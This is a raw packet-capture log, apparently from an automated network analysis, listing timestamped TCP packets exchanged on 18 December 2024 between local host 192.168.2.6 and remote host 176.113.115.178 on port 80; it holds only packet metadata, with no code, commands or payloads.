                                                                  Dec 18, 2024 13:49:51.759274006 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.759423018 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.760175943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.760189056 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.760348082 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.761125088 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.761137962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.761215925 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.762073040 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.762087107 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.762099028 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.762176037 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.762176037 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.762978077 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.762998104 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.763149977 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.763915062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.763931036 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.763997078 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.764867067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.764885902 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.765057087 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.765815020 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.765829086 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.765945911 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.766746998 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.766771078 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.766855955 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.767672062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.767729998 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.767798901 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.768600941 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.768619061 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.768687010 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.769520998 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.769537926 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.769598007 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.770436049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.770448923 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.770459890 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.770517111 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.771428108 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.771440029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.771563053 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.772355080 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.772370100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.772470951 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.773252010 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.773266077 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.773386955 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.774194002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.774209976 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.774220943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.774329901 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.775151014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.775170088 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.775571108 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.776067019 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.776082993 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.776141882 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.777012110 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.777025938 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.777118921 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.777921915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.777935982 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.778002024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.778837919 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.778851032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.778876066 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.778949022 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.779825926 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.779841900 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.779915094 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.780690908 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.780760050 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.917273998 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.917434931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.917516947 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.917979002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.918229103 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.918406010 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.918499947 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.918900967 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.918997049 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.919471979 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.919945002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.920011997 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.920456886 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.920758963 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.920795918 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.921828032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.922015905 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.922116995 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.922682047 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.922909975 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.922966957 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.923494101 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.923703909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.924149990 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.924473047 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.924724102 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.924839973 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.925609112 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.925923109 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.926057100 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.928735018 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.928752899 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.928860903 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.929562092 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.929578066 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.929765940 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.930386066 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.930401087 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.930452108 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.931739092 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.931752920 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.931962013 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.932539940 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.932553053 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.932607889 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.933572054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.934449911 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.934464931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.934475899 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.934505939 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.934557915 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.935184002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.935197115 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.935246944 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.937186956 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.937201023 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.937314034 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.937803984 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.937819004 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.937882900 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.938508987 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.938522100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.938576937 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.938993931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.939006090 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.939060926 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.939704895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.939718962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.939995050 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.940552950 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.940567017 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.940629005 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.941402912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.942428112 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.942481995 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.942517042 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.942989111 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.943100929 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.944086075 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.944099903 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.944144964 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.944811106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.944823980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.944864988 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.945633888 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.945650101 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.945745945 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.946449995 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.946465969 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.946576118 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.947276115 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.947711945 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.947844028 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.948163986 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.948178053 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.948218107 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.948956966 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.949501038 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.949542046 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.949850082 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.950407028 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.950478077 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.950815916 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.951165915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.951221943 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.951778889 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.951948881 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.952275038 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.952764034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.953109980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.953165054 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.953721046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.953936100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.953995943 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.954669952 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.954930067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.955017090 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.955713034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.955986023 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.956099033 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.956717014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.956948042 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.957000971 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.957751036 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.957936049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.958121061 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.958755970 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.958951950 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.959217072 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.959836960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.960199118 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.960262060 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.960931063 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.961183071 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.961230993 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.962073088 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.962295055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.962371111 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.963052988 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.963283062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.963499069 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.964065075 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.964318991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.964420080 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.965092897 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.965250969 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.965322018 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.966123104 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.966222048 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.966301918 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.966913939 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.967124939 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.967215061 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.967909098 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.968153954 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.968343973 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.968837023 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.969147921 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:51.969218016 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:51.969760895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.009403944 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.109559059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.109889030 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.110003948 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.110311031 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.110825062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.110969067 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.111155033 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.111567974 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.111675024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.112073898 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.112448931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.112555981 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.113137960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.113240957 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.113308907 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.114193916 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.114278078 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.114500999 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.115024090 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.115257978 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.115335941 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.116085052 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.116305113 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.116425037 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.117141008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.117399931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.117464066 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.118120909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.118457079 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.118520021 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.119119883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.119304895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.119402885 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.120076895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.120295048 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.120362043 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.121094942 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.121304035 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.121354103 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.122133970 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.122561932 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.122749090 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.123101950 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.123680115 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.123761892 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.124145985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.124351025 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.124736071 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.125145912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.125403881 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.125468969 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.126132011 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.126564026 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.126651049 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.127135992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.127490044 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.127563000 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.128118992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.128438950 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.128521919 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.129101992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.129398108 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.129479885 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.130203962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.130629063 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.130795956 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.131192923 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.131452084 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.131516933 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.132286072 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.132417917 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.132476091 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.133326054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.133599043 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.133692980 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.134449005 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.134551048 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.134634018 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.135281086 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.135452032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.135538101 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.136262894 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.136461973 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.136511087 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.137546062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.137721062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.137815952 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.138187885 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.138566017 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.138641119 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.139266968 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.139456034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.139553070 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.140248060 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.140544891 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:52.140608072 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:52.141244888 CET8049822176.113.115.178192.168.2.6
